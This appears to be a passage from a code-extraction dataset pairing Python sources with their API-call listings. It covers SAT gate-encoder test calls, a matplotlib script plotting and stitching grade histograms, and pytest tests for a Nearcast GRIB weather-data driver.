'lhs_input_lits': 'lhs_input_lits', 'rhs_input_lits': 'rhs_input_lits', 'select_lhs_lit': 'select_lhs_lit'}), '(clause_consumer=clause_consumer, lit_factory=\n lit_factory, lhs_input_lits=lhs_input_lits, rhs_input_lits=\n rhs_input_lits, select_lhs_lit=select_lhs_lit)\n', (36040, 36201), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((38205, 38311), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'clause_consumer', 'lit_factory': 'lit_factory', 'input_lits': '[]'}), '(clause_consumer=clause_consumer, lit_factory=\n lit_factory, input_lits=[])\n', (38233, 38311), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((38973, 38991), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (38989, 38991), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((39089, 39215), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': '[input_lit]', 'output_lits': '[output_lit]'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=[input_lit], output_lits=[output_lit])\n', (39117, 39215), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((40734, 40752), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (40750, 40752), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((40850, 40975), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': '[input_lit]', 'output_lits': '[output_lit]'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=[input_lit], output_lits=[output_lit])\n', (40877, 40975), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((2074, 2234), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', (['clause_consumer', 'lit_factory', '__noop_encoder'], {'lhs_input_lits': '[lits[0]]', 'rhs_input_lits': '[lits[1], lits[2]]', 'output_lits': '[lits[3]]'}), '(clause_consumer, lit_factory, __noop_encoder,\n lhs_input_lits=[lits[0]], rhs_input_lits=[lits[1], lits[2]],\n output_lits=[lits[3]])\n', (2096, 2234), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((2834, 3003), 'cscl.bitvector_gate_encoders.encode_gate_vector', 'bvg.encode_gate_vector', 
(['clause_consumer', 'lit_factory', '__noop_encoder'], {'lhs_input_lits': '[lits[0], lits[1]]', 'rhs_input_lits': '[lits[2], lits[3]]', 'output_lits': '[lits[4]]'}), '(clause_consumer, lit_factory, __noop_encoder,\n lhs_input_lits=[lits[0], lits[1]], rhs_input_lits=[lits[2], lits[3]],\n output_lits=[lits[4]])\n', (2856, 3003), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((6570, 6588), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (6586, 6588), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((6933, 6972), 'cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator', 'LoggingClauseConsumerDecorator', (['checker'], {}), '(checker)\n', (6963, 6972), False, 'from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator\n'), ((6999, 7168), 'cscl.bitvector_gate_encoders.encode_bv_ripple_carry_adder_gate', 'bvg.encode_bv_ripple_carry_adder_gate', (['clause_consumer', 'checker', 'lhs_input_lits', 'rhs_input_lits'], {'output_lits': 'None', 'carry_in_lit': 'carry_in', 'carry_out_lit': 'carry_out'}), '(clause_consumer, checker,\n lhs_input_lits, rhs_input_lits, output_lits=None, carry_in_lit=carry_in,\n carry_out_lit=carry_out)\n', (7036, 7168), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((15879, 15897), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (15895, 15897), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((15928, 15967), 'cscl_tests.testutils.logging_clause_consumer_decorator.LoggingClauseConsumerDecorator', 'LoggingClauseConsumerDecorator', (['checker'], {}), '(checker)\n', (15958, 15967), False, 'from cscl_tests.testutils.logging_clause_consumer_decorator import LoggingClauseConsumerDecorator\n'), ((18900, 18948), 'unittest.TestCase.assertRaises', 'unittest.TestCase.assertRaises', (['self', 'ValueError'], {}), '(self, ValueError)\n', (18930, 18948), False, 'import unittest\n'), ((22637, 22685), 'unittest.TestCase.assertRaises', 'unittest.TestCase.assertRaises', (['self', 'ValueError'], {}), '(self, ValueError)\n', (22667, 22685), False, 'import unittest\n'), ((39741, 39759), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (39757, 39759), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((39858, 39957), 'cscl.bitvector_gate_encoders.encode_staggered_or_gate', 'bvg.encode_staggered_or_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits)\n', (39886, 39957), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((41520, 41538), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (41536, 41538), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((41711, 41834), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits', 'output_lits': 'output_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits, output_lits=output_lits)\n', (41738, 41834), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((43254, 43272), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (43270, 43272), False, 
'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((43313, 43411), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits)\n', (43340, 43411), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((43539, 43557), 'cscl_tests.testutils.trivial_sat_solver.TrivialSATSolver', 'TrivialSATSolver', ([], {}), '()\n', (43555, 43557), False, 'from cscl_tests.testutils.trivial_sat_solver import TrivialSATSolver\n'), ((43715, 43838), 'cscl.bitvector_gate_encoders.encode_bv_popcount_gate', 'bvg.encode_bv_popcount_gate', ([], {'clause_consumer': 'solver', 'lit_factory': 'solver', 'input_lits': 'input_lits', 'output_lits': 'output_lits'}), '(clause_consumer=solver, lit_factory=solver,\n input_lits=input_lits, output_lits=output_lits)\n', (43742, 43838), True, 'import cscl.bitvector_gate_encoders as bvg\n'), ((7999, 8047), 'itertools.chain', 'itertools.chain', (['probe_lhs', 'probe_rhs', 'probe_out'], {}), '(probe_lhs, probe_rhs, probe_out)\n', (8014, 8047), False, 'import itertools\n'), ((8624, 8661), 'itertools.chain', 'itertools.chain', (['probe_lhs', 'probe_rhs'], {}), '(probe_lhs, probe_rhs)\n', (8639, 8661), False, 'import itertools\n'), ((41441, 41461), 'math.log2', 'math.log2', (['(width + 1)'], {}), '(width + 1)\n', (41450, 41461), False, 'import math\n')]
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os
from PIL import Image
#val = {'2017Autumn': {'A': 12, 'C': 2, 'B': 3, 'D': 0, 'F': 0, 'P': 0, 'EX': 8}, '2018Spring': {'A': 6, 'C': 3, 'B': 6, 'D': 3, 'F': 0, 'P': 3, 'EX': 4}, '2016Spring': {'A': 2, 'C': 0, 'B': 1, 'D': 0, 'F': 0, 'P': 0, 'EX': 3}, '2017Spring': {'A': 12, 'C': 2, 'B': 3, 'D': 0, 'F': 0, 'P': 0, 'EX': 8}}
x_groups = ['EX', 'A', 'B', 'C', 'D', 'P', 'F']
def DrawLineHistorical():
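    # Paints a 12-pixel-high gray band across the top of the historical-average
    # image, presumably as a visual separator in the final stitched figure.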
im = Image.open('Grades/Temp_files/HistoricalAverage.png')
width, height = im.size
for x in range(width):
for y in range(12):
im.putpixel((x,y),(146,138,138))
im.save('Grades/Temp_files/HistoricalAverage.png')
def RemovePreviousStitchedImage():  # Deletes the previously stitched combined-graph image.
mydir = 'figure/'
filelist = [ f for f in os.listdir(mydir) if f.endswith(".jpg") ]
for f in filelist:
os.remove(os.path.join(mydir, f))
def RemovePreviousIndividualGraphs():  # Deletes the previously generated individual graph images.
mydir = 'Grades/Temp_files/'
filelist = [ f for f in os.listdir(mydir) if f.endswith(".png") ]
for f in filelist:
os.remove(os.path.join(mydir, f))
def CombineImage(val, code):  # Stitches the individual graphs together into one image.
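    # First pass: measure each per-semester graph to size the combined canvas;
    # second pass: paste each image at a running vertical offset.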
total_height = 0
max_width = 0
courses_available_sorted = []
for semester, grades in val.items():
im = Image.open('Grades/Temp_files/%s.png' % semester)
width, height = im.size
total_height = total_height + height
max_width = max(max_width,width)
courses_available_sorted.append(semester)
courses_available_sorted.sort()
#The following code is for historical average
im = Image.open('Grades/Temp_files/HistoricalAverage.png')
width, height = im.size
total_height = total_height + height
max_width = max(max_width,width)
courses_available_sorted.append('HistoricalAverage')
img = Image.new('RGB', (max_width, total_height ))
y_offset = 0
for semester in courses_available_sorted:
im = Image.open('Grades/Temp_files/%s.png' % semester)
img.paste(im, (0,y_offset))
y_offset += im.size[1]
img.save('figure/%s.jpg' % code)
    RemovePreviousIndividualGraphs()
def GeneratePlots(x_groups, x, y_values, semester):
    plt.bar(x, y_values)
    plt.title(semester)
    plt.ylabel('No of students')
    plt.xticks(x, x_groups)
    for i in range(len(x_groups)):
        if y_values[i] > 0:
            plt.text(x=i - 0.3, y=y_values[i] + 0.005, s=y_values[i], size=12)
    plt.savefig('Grades/Temp_files/%s.png' % semester)
    plt.close()
def MakeGraphs(val, code) :
number_courses = 0
total_grades = [0] * 7 #This variable stores sum of grades corresponding to EX, A, B, C, D, P, F
#print("Makegraphbegin")
    x = range(7)
    for semester, grades in val.items():
y_values = [grades['EX'],grades['A'],grades['B'],grades['C'],grades['D'],grades['P'],grades['F']]
for i in range(7):
total_grades[i] = total_grades[i] + y_values[i]
GeneratePlots(x_groups,x,y_values,semester)
number_courses = number_courses+1
avg_grades = [0.0] * 7
for i in range(7):
avg_grades[i] = float(total_grades[i])/number_courses
GeneratePlots(x_groups,x,avg_grades,'HistoricalAverage')
    RemovePreviousStitchedImage()
DrawLineHistorical()
CombineImage(val, code)
#print ("Makegraph_end")
#MakeGraphs(val,'2')
|
[
"matplotlib.pyplot.title",
"PIL.Image.new",
"matplotlib.pyplot.close",
"matplotlib.pyplot.bar",
"PIL.Image.open",
"matplotlib.pyplot.text",
"matplotlib.use",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xticks",
"os.path.join",
"os.listdir",
"matplotlib.pyplot.savefig"
] |
[((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((564, 617), 'PIL.Image.open', 'Image.open', (['"""Grades/Temp_files/HistoricalAverage.png"""'], {}), "('Grades/Temp_files/HistoricalAverage.png')\n", (574, 617), False, 'from PIL import Image\n'), ((1838, 1891), 'PIL.Image.open', 'Image.open', (['"""Grades/Temp_files/HistoricalAverage.png"""'], {}), "('Grades/Temp_files/HistoricalAverage.png')\n", (1848, 1891), False, 'from PIL import Image\n'), ((2070, 2113), 'PIL.Image.new', 'Image.new', (['"""RGB"""', '(max_width, total_height)'], {}), "('RGB', (max_width, total_height))\n", (2079, 2113), False, 'from PIL import Image\n'), ((2456, 2476), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'y_values'], {}), '(x, y_values)\n', (2463, 2476), True, 'import matplotlib.pyplot as plt\n'), ((2484, 2503), 'matplotlib.pyplot.title', 'plt.title', (['semester'], {}), '(semester)\n', (2493, 2503), True, 'import matplotlib.pyplot as plt\n'), ((2521, 2549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""No of students"""'], {}), "('No of students')\n", (2531, 2549), True, 'import matplotlib.pyplot as plt\n'), ((2558, 2581), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x', 'x_groups'], {}), '(x, x_groups)\n', (2568, 2581), True, 'import matplotlib.pyplot as plt\n'), ((2757, 2807), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (2768, 2807), True, 'import matplotlib.pyplot as plt\n'), ((2816, 2827), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2825, 2827), True, 'import matplotlib.pyplot as plt\n'), ((1523, 1572), 'PIL.Image.open', 'Image.open', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (1533, 1572), False, 'from PIL import Image\n'), ((2192, 2241), 'PIL.Image.open', 'Image.open', (["('Grades/Temp_files/%s.png' % semester)"], {}), "('Grades/Temp_files/%s.png' % semester)\n", (2202, 2241), False, 'from PIL import Image\n'), ((948, 965), 'os.listdir', 'os.listdir', (['mydir'], {}), '(mydir)\n', (958, 965), False, 'import os\n'), ((1032, 1054), 'os.path.join', 'os.path.join', (['mydir', 'f'], {}), '(mydir, f)\n', (1044, 1054), False, 'import os\n'), ((1208, 1225), 'os.listdir', 'os.listdir', (['mydir'], {}), '(mydir)\n', (1218, 1225), False, 'import os\n'), ((1292, 1314), 'os.path.join', 'os.path.join', (['mydir', 'f'], {}), '(mydir, f)\n', (1304, 1314), False, 'import os\n'), ((2667, 2733), 'matplotlib.pyplot.text', 'plt.text', ([], {'x': '(i - 0.3)', 'y': '(y_values[i] + 0.005)', 's': 'y_values[i]', 'size': '(12)'}), '(x=i - 0.3, y=y_values[i] + 0.005, s=y_values[i], size=12)\n', (2675, 2733), True, 'import matplotlib.pyplot as plt\n')]
|
import pygrib
import os
import pytz
import datetime as dt
import pytest
from forest_lite.server.drivers import nearcast
from forest_lite.server.drivers.nearcast import (driver,
parse_date,
get_data_vars,
get_first_fixed_surface,
get_validity)
from forest_lite.server.drivers.base import BaseDriver
from numpy.testing import assert_array_almost_equal
UTC = pytz.timezone('UTC')
SAMPLE_DIR = os.path.join(os.path.dirname(__file__), "sample")
@pytest.fixture
def real_file():
return os.path.join(SAMPLE_DIR,
"NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2")
@pytest.fixture
def sample_file():
return os.path.join(SAMPLE_DIR, "nearcast.grib2")
@pytest.fixture
def settings(sample_file):
return {"pattern": sample_file}
@pytest.fixture
def data_var():
return "Pseudo-adiabatic potential temperature"
def test_importable():
assert isinstance(driver, BaseDriver)
def test_description(settings):
actual = driver.description(settings).dict()
assert actual["attrs"] == {
"product": "Nearcast",
"reference": "CIMSS, University Wisconsin-Madison",
}
data_var = "Pseudo-adiabatic potential temperature"
assert actual["data_vars"][data_var] == {
"dims": ["start_time", "time", "level"],
"attrs": {
"long_name": "Pseudo-adiabatic potential temperature",
"units": "K"
}
}
@pytest.mark.parametrize("object_key,expected", [
("NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2", dt.datetime(2021, 1, 25,
tzinfo=UTC)),
("nearcast.grib2", None)
])
def test_parse_date(object_key, expected):
actual = parse_date(object_key)
assert actual == expected
def test_driver_points(settings):
data_var = ""
dim_name = nearcast.DIMENSION.start_time.name
actual = driver.points(settings, data_var, dim_name)["data"]
expected = [dt.datetime(1970, 1, 1)]
assert actual == expected
def test_driver_points_given_start_time_query():
settings = nearcast.Settings(pattern=os.path.join(SAMPLE_DIR, "*GRIB2"))
start_date = dt.datetime(2021, 1, 21, 0, 30, tzinfo=UTC)
query = {nearcast.DIMENSION.start_time.name: start_date}
dim_name = nearcast.DIMENSION.time.name
data_var = "U component of wind"
response = driver.points(settings, data_var, dim_name, query=query)
actual = response["data"][0]
expected = start_date
assert actual == expected
def test_driver_tilable(settings, data_var):
time = dt.datetime(2019, 12, 16, 14, 30, tzinfo=UTC)
timestamp_ms = time.timestamp() * 1000
query = {
"time": timestamp_ms
}
actual = driver.tilable(settings, data_var, query=query)
expected = (300,)
assert actual["latitude"].shape == expected
def test_get_validity(sample_file, data_var):
actual = list(get_validity(sample_file, data_var))
expected = [dt.datetime(2019, 12, 16, 14, 30, tzinfo=UTC)]
assert actual == expected
def test_get_first_fixed_surface(sample_file, data_var):
actual = list(get_first_fixed_surface(sample_file, data_var))
expected = [1]
assert actual == expected
def test_get_data_vars_given_sample_file(sample_file):
actual = list(get_data_vars(sample_file))
expected = [{
"name": "Pseudo-adiabatic potential temperature",
"units": "K"
}]
assert actual == expected
def test_get_data_vars_given_real_file(real_file):
actual = list(get_data_vars(real_file))
expected = [{
"name": "Pseudo-adiabatic potential temperature",
"units": "K"
}, {
"name": "Precipitable water",
"units": "kg m**-2"
}, {
"name": "U component of wind",
"units": "m s**-1"
}, {
"name": "V component of wind",
"units": "m s**-1"
}]
def tuples(items):
return set([(item["name"], item["units"]) for item in items])
assert tuples(actual) == tuples(expected)
@pytest.mark.parametrize("var_name", [
"Pseudo-adiabatic potential temperature",
"Precipitable water",
"U component of wind",
"V component of wind",
])
def test_get_first_fixed_surface_given_real_file(real_file, var_name):
actual = sorted(set((get_first_fixed_surface(real_file, var_name))))
# expected = [1, 699999988, 899999976]
expected = [1, 699, 899]
assert actual == expected
@pytest.mark.parametrize("var_name", [
"Pseudo-adiabatic potential temperature",
"Precipitable water",
"U component of wind",
"V component of wind",
])
def test_get_validity_given_real_file(real_file, var_name):
start = dt.datetime(2021, 1, 25, 0, 0, tzinfo=UTC)
actual = sorted(set((get_validity(real_file, var_name))))
expected = [start + i * dt.timedelta(minutes=30) for i in range(19)]
assert actual == expected
def test_get_validity_given_real_file_unknown_variable(real_file):
actual = sorted(set((get_validity(real_file, "foo"))))
expected = []
assert actual == expected
def test_parse_date_given_real_file(real_file):
assert parse_date(real_file) == dt.datetime(2021, 1, 25, tzinfo=UTC)
def test_tilable_given_real_file(real_file):
settings = {"pattern": real_file}
data_var = "U component of wind"
time = dt.datetime(2021, 1, 25, 0, 0, 0, tzinfo=UTC)
timestamp_ms = time.timestamp() * 1000
level = 699999988
query = {
"start_time": 0,
"time": timestamp_ms,
"level": level
}
json = driver.tilable(settings, data_var, query=query)
actual = json["values"]
expected = [1, 2, 3]
assert actual[0, 0] == -7.644691467285156e-1
# assert_array_almost_equal(actual, expected)
@pytest.mark.parametrize("date,expected", [
(dt.datetime(1970, 1, 1, 0, 0, 0, tzinfo=UTC), 0),
(dt.datetime(2021, 1, 25, 0, 0, 0, tzinfo=UTC), 1611532800),
])
def test_datetime_to_timestamp(date, expected):
assert date.timestamp() == expected
def test_pygrib_select_real_file(real_file):
name = "U component of wind"
messages = pygrib.index(real_file,
"name",
"validityTime",
"scaledValueOfFirstFixedSurface")
time = 0 # NOTE: zero-padded strings raise Runtime errors
# level = 899999976
level = 899
actual = []
for message in messages.select(name=name,
validityTime=time,
scaledValueOfFirstFixedSurface=level):
actual.append(message["scaledValueOfFirstFixedSurface"])
messages.close()
assert actual == [level]
@pytest.mark.parametrize("date,path,time", [
pytest.param(dt.datetime(2021, 1, 25, 0, 31, tzinfo=UTC),
"NEARCAST_20210125_0030_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 0, 30, tzinfo=UTC), id="during"),
pytest.param(dt.datetime(2021, 1, 26, 0, 0, tzinfo=UTC),
"NEARCAST_20210125_0100_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 1, 0, tzinfo=UTC), id="after"),
pytest.param(dt.datetime(2021, 1, 20, 0, 0, tzinfo=UTC),
"NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2",
dt.datetime(2021, 1, 25, 0, 0, tzinfo=UTC), id="before"),
])
def test_find_nearest(date, path, time):
file_names = ["NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2",
"NEARCAST_20210125_0030_LAKEVIC_LATLON.GRIB2",
"NEARCAST_20210125_0100_LAKEVIC_LATLON.GRIB2"]
actual = nearcast.find_nearest(file_names, date)
assert actual.path == path
assert actual.timestamp == time
|
[
"forest_lite.server.drivers.nearcast.driver.description",
"forest_lite.server.drivers.nearcast.driver.points",
"forest_lite.server.drivers.nearcast.find_nearest",
"forest_lite.server.drivers.nearcast.parse_date",
"os.path.dirname",
"pygrib.index",
"forest_lite.server.drivers.nearcast.get_data_vars",
"datetime.datetime",
"datetime.timedelta",
"pytz.timezone",
"forest_lite.server.drivers.nearcast.driver.tilable",
"forest_lite.server.drivers.nearcast.get_first_fixed_surface",
"pytest.mark.parametrize",
"os.path.join",
"forest_lite.server.drivers.nearcast.get_validity"
] |
[((554, 574), 'pytz.timezone', 'pytz.timezone', (['"""UTC"""'], {}), "('UTC')\n", (567, 574), False, 'import pytz\n'), ((4179, 4335), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""var_name"""', "['Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind']"], {}), "('var_name', [\n 'Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind'])\n", (4202, 4335), False, 'import pytest\n'), ((4595, 4751), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""var_name"""', "['Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind']"], {}), "('var_name', [\n 'Pseudo-adiabatic potential temperature', 'Precipitable water',\n 'U component of wind', 'V component of wind'])\n", (4618, 4751), False, 'import pytest\n'), ((601, 626), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (616, 626), False, 'import os\n'), ((684, 755), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2"""'], {}), "(SAMPLE_DIR, 'NEARCAST_20210125_0000_LAKEVIC_LATLON.GRIB2')\n", (696, 755), False, 'import os\n'), ((828, 870), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""nearcast.grib2"""'], {}), "(SAMPLE_DIR, 'nearcast.grib2')\n", (840, 870), False, 'import os\n'), ((1890, 1912), 'forest_lite.server.drivers.nearcast.parse_date', 'parse_date', (['object_key'], {}), '(object_key)\n', (1900, 1912), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2328, 2371), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(21)', '(0)', '(30)'], {'tzinfo': 'UTC'}), '(2021, 1, 21, 0, 30, tzinfo=UTC)\n', (2339, 2371), True, 'import datetime as dt\n'), ((2529, 2585), 'forest_lite.server.drivers.nearcast.driver.points', 'driver.points', (['settings', 'data_var', 'dim_name'], {'query': 'query'}), '(settings, data_var, dim_name, query=query)\n', (2542, 2585), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2733, 2778), 'datetime.datetime', 'dt.datetime', (['(2019)', '(12)', '(16)', '(14)', '(30)'], {'tzinfo': 'UTC'}), '(2019, 12, 16, 14, 30, tzinfo=UTC)\n', (2744, 2778), True, 'import datetime as dt\n'), ((2884, 2931), 'forest_lite.server.drivers.nearcast.driver.tilable', 'driver.tilable', (['settings', 'data_var'], {'query': 'query'}), '(settings, data_var, query=query)\n', (2898, 2931), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((4834, 4876), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, tzinfo=UTC)\n', (4845, 4876), True, 'import datetime as dt\n'), ((5474, 5519), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, 0, tzinfo=UTC)\n', (5485, 5519), True, 'import datetime as dt\n'), ((5694, 5741), 'forest_lite.server.drivers.nearcast.driver.tilable', 'driver.tilable', (['settings', 'data_var'], {'query': 'query'}), '(settings, data_var, query=query)\n', (5708, 5741), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((6246, 6331), 'pygrib.index', 'pygrib.index', (['real_file', '"""name"""', 
'"""validityTime"""', '"""scaledValueOfFirstFixedSurface"""'], {}), "(real_file, 'name', 'validityTime',\n 'scaledValueOfFirstFixedSurface')\n", (6258, 6331), False, 'import pygrib\n'), ((7720, 7759), 'forest_lite.server.drivers.nearcast.find_nearest', 'nearcast.find_nearest', (['file_names', 'date'], {}), '(file_names, date)\n', (7741, 7759), False, 'from forest_lite.server.drivers import nearcast\n'), ((2060, 2103), 'forest_lite.server.drivers.nearcast.driver.points', 'driver.points', (['settings', 'data_var', 'dim_name'], {}), '(settings, data_var, dim_name)\n', (2073, 2103), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((2128, 2151), 'datetime.datetime', 'dt.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (2139, 2151), True, 'import datetime as dt\n'), ((3068, 3103), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['sample_file', 'data_var'], {}), '(sample_file, data_var)\n', (3080, 3103), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3121, 3166), 'datetime.datetime', 'dt.datetime', (['(2019)', '(12)', '(16)', '(14)', '(30)'], {'tzinfo': 'UTC'}), '(2019, 12, 16, 14, 30, tzinfo=UTC)\n', (3132, 3166), True, 'import datetime as dt\n'), ((3275, 3321), 'forest_lite.server.drivers.nearcast.get_first_fixed_surface', 'get_first_fixed_surface', (['sample_file', 'data_var'], {}), '(sample_file, data_var)\n', (3298, 3321), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3447, 3473), 'forest_lite.server.drivers.nearcast.get_data_vars', 'get_data_vars', (['sample_file'], {}), '(sample_file)\n', (3460, 3473), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((3680, 3704), 'forest_lite.server.drivers.nearcast.get_data_vars', 'get_data_vars', (['real_file'], {}), '(real_file)\n', (3693, 3704), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5279, 5300), 'forest_lite.server.drivers.nearcast.parse_date', 'parse_date', (['real_file'], {}), '(real_file)\n', (5289, 5300), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5304, 5340), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, tzinfo=UTC)\n', (5315, 5340), True, 'import datetime as dt\n'), ((1152, 1180), 'forest_lite.server.drivers.nearcast.driver.description', 'driver.description', (['settings'], {}), '(settings)\n', (1170, 1180), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((1699, 1735), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, tzinfo=UTC)\n', (1710, 1735), True, 'import datetime as dt\n'), ((2275, 2309), 'os.path.join', 'os.path.join', (['SAMPLE_DIR', '"""*GRIB2"""'], {}), "(SAMPLE_DIR, '*GRIB2')\n", (2287, 2309), False, 'import os\n'), ((4442, 4486), 'forest_lite.server.drivers.nearcast.get_first_fixed_surface', 'get_first_fixed_surface', (['real_file', 'var_name'], {}), '(real_file, var_name)\n', (4465, 4486), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, 
get_first_fixed_surface, get_validity\n'), ((4902, 4935), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['real_file', 'var_name'], {}), '(real_file, var_name)\n', (4914, 4935), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5136, 5166), 'forest_lite.server.drivers.nearcast.get_validity', 'get_validity', (['real_file', '"""foo"""'], {}), "(real_file, 'foo')\n", (5148, 5166), False, 'from forest_lite.server.drivers.nearcast import driver, parse_date, get_data_vars, get_first_fixed_surface, get_validity\n'), ((5945, 5989), 'datetime.datetime', 'dt.datetime', (['(1970)', '(1)', '(1)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(1970, 1, 1, 0, 0, 0, tzinfo=UTC)\n', (5956, 5989), True, 'import datetime as dt\n'), ((6000, 6045), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(0)', '(0)'], {'tzinfo': 'UTC'}), '(2021, 1, 25, 0, 0, 0, tzinfo=UTC)\n', (6011, 6045), True, 'import datetime as dt\n'), ((6884, 6927), 'datetime.datetime', 'dt.datetime', (['(2021)', '(1)', '(25)', '(0)', '(31)'], {'tzinfo': 'UTC'}), '(2021, 1, 